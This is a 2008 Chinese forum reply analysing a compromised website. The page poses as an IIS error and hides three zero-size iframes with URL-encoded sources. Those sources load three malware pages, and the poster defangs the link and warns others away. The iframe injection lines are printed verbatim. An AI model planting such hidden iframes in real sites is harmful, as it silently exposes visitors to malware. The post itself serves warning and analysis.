回复: 我学校这个网站真有病毒吗
原帖由
超级游戏迷 于 2008-8-29 22:10:00 发表
原帖由
清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢
那就麻烦楼上做个全面的分析吧
如果真分析我就把它主页换了,以免害人!
上学网的人肯定多,而且木马网页第一链接位置也是一所学校,可能那个学校的网站只是一个肉鸡
在hxxp://www.92bdd.com/xs/index.htm(为了安全我把tt换成xx)
大家不要打开,里面是页面其实真正的木马不在这个页面
这个页面表面上是个IIS的错误信息,实际上是个挂马网页,这个人很动脑子
这个页面里有三个嵌套语句:
<iframe src="%68%61%70%70%79%31.%68%74%6D" width="0" height="0" border="0"></iframe>
<iframe src="%68%61%70%70%79%32.%68%74%6D" width="0" height="0" border="0"></iframe>
<iframe src="%68%61%70%70%79%33.%68%74%6D" width="0" height="0" border="0"></iframe>
%68%61%70%70%79%31.%68%74%6D翻译的结果是happy1.htm
分别是三个病毒页面
happy1.htm
happy2.htm
happy3.htm
